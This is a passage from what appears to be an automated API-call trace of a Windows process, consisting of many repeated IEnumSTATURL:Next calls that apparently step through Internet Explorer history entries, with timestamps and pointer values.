This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.724] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.724] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.724] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.724] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.724] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.724] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.725] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.726] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.726] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.726] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.726] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.726] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.770] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.770] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.771] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.771] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.771] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.771] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.771] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.771] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.772] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.772] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.772] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.789] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.792] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.792] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.792] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.793] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.794] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.794] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.794] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.794] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.794] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.796] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.796] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.796] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.798] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.798] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.798] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.798] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.799] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.799] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.804] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.822] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.825] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.826] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.826] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.826] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.826] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.826] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.826] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.827] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.828] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.829] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.829] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.829] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.829] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.829] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.830] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.830] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.830] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.830] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.830] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.833] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.833] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.833] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.833] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.833] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.834] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.834] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.834] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.834] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.834] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.835] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.836] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.836] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.836] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.836] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.837] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.837] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.837] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.838] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.838] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.838] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.838] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.839] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.839] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.839] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.839] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.840] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.840] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.840] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.840] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.840] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.840] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.844] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.844] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.844] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.844] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.844] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.846] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.846] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.846] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.846] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.847] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.848] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.849] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, 